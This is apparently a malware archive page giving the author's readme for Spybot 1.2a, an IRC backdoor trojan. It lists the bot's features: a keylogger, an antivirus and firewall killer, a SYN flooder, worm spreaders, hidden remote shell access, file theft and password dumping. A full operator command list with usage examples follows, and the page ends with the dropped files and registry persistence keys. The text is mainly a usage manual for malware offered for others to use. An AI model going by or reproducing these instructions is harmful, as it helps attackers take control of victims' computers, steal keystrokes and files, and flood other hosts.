Spybot 1.2a
(Backdoor.Win32.Spyboter.g)

by Mich

Written in C, source included

Released in april 2003

more versions 


Spybot1.2a by Mich	
Opensource irc bot
		 
Date: 08:04:2003

Fixed the kuang spreader 


Date: 05:04:2003

Features: 

- HTTP server
Bot has now a build in http server with option to set rootdir and port 
example: if you set port t0 81 and rootdir to c:\ and you go to url http://victums.ip.address.com:81/ then it will list al files
and dirs in the c:\ dir (same as a filemanager)

- Threads list list of all running threads and option to kill a thread

- Port scanner

- Syn flooder

- Kuang2 and sub7 spreader 

- KaZaa spreader

- Remote cmd.exe runs cmd.exe hidden on the remote pc this allows you to do commands like netstat ftp telnet etc. etc. (doesnt work on win9x as far as i know)

- Keylogger Online and offline keylogger

- PortRedirect

- List processes  
Shows al running processes. 
You can kill a process.

- AV/Firewall killer

- DCC Send
You can send a file to the bot with the normal dcc send option in mIRC (only tested it with mIRC6.03 get it from www.mirc.com)

- Get File
Download a file from the bot�s pc (the bot will start a dcc send)

- DCC Chat
Just normal dcc chat option in mIRC all commands will also work here, use this if you want do giff a command that has a lot of output most irc servers will disconnect the bot if it sends a lot of data.

- List files
List al files and dirs within your sears query example list c:\windows\*.exe will list al .exe files in the windows dir

- Hostmask match login
When you do the login [password] commands the bot checks if your hostmask matches a hostmask in the trusted hosts list (settings.h). if not you cant login 

- Raw Commands (on connect and onjoin)
Bot reads a list of raw commands when its connected or joins a channel
Example:
On join:
	MODE $CHAN +nts
	MODE $CHAN +k trojanforge
On Connect
	MODE $NICK +I

- Computer info
Gives some pc info including ip address
 
- Topic commands
Option to gif the bot a command with the topic (when the bot joins the channel)

- Lists the passwords (only win 9x)
- Execute, delete, rename file And make dir
- Sendkeys 
- Open/close cd-rom
- Reboot pc
- Disconnect for x sec.
- Reconnect
- Quit 
- Raw commands


Commands list

Login password
raw [raw command]							(example: raw PRIVMSG #spybot1.1 :hello)
list [path+filter]	  						(example: list c:\*.*)
delete [filename]							(example: delete c:\windows\netstat.exe)
execute [filename]
rename [origenamfile] [newfile]						(example: rename c:\windows\netstat.exe c:\windows\netstatbackup.bak)
makedir [dirname]							(example: makedir c:\test\  )
startkeylogger 								(info: starts onlinekeylogger and output's to the channel\query\dcc chat)
stopkeylogger
sendkeys [keys]								(info: simulates keypresses, to simulate return hit ctrl+b (bold in mIRC) and for backspace ctrl+u (underlined in mIRC))
keyboardlights								(info: flashes his keyboard lights 50x)
info									(info: gives some info)
passwords								(info: lists the ras passwords in win 9x)
listprocesses								(info: lists all running proccesses)
killprocess [processname] 						(example: killprocess taskmgr.exe)   NOTE: if with listprocesses the entire path shows up you must use it with killprocess to)
reconnect
disconnect [sec.]							(info: disconnect the bot for x sec. if sec. is not given it disconnect the bot for 30mins.)
quit									(info: bot quits running)
reboot
cd-rom [0/1]								(info: opens\close cd-rom. cd-rom 1 = open cd-rom 0 = close)
httpserver [port] [root-dir]         					(example: httpserver 81 c:\)
syn [host] [port] [delay msec.] [times]					(example: syn 127.0.0.1 80 100 1000)
redirect [input port] [host] [output port]				(example: redirect 100 eu.undernet.org 6667)
threads									(info: will list al threads)
killthread [number]							(info: kills the selected thread)
get [filename]								(example: get c:\windows\system\keylogs.txt will trigger a dcc send on the remote pc)
opencmd									(info: starts cmd.exe on the  remote pc hidden)
cmd [command]								(info: sends a command to cmd.exe example: cmd netstat -an)
scan [start ip address] [port] [delay] [filename] 
example: scan 127.0.0.1 17300 1 portscan.txt 
filename is optional when used result will be logged to the filename, if ip is 0 a random ip is generated

DCC

DCC chat & DCC send & DCC get works with any normal irc client in mIRC the command is: /dcc chat [nickname] and: dcc send [nickname]

Mich


Server:
dropped files:
c:\WINDOWS\SYSTEM\avg32.exe   Size: 20.512 bytes 
c:\WINDOWS\SYSTEM\KEYLOG.TXT 

startup:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce "Winsockport" 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "Winsockport"
MegaSecurity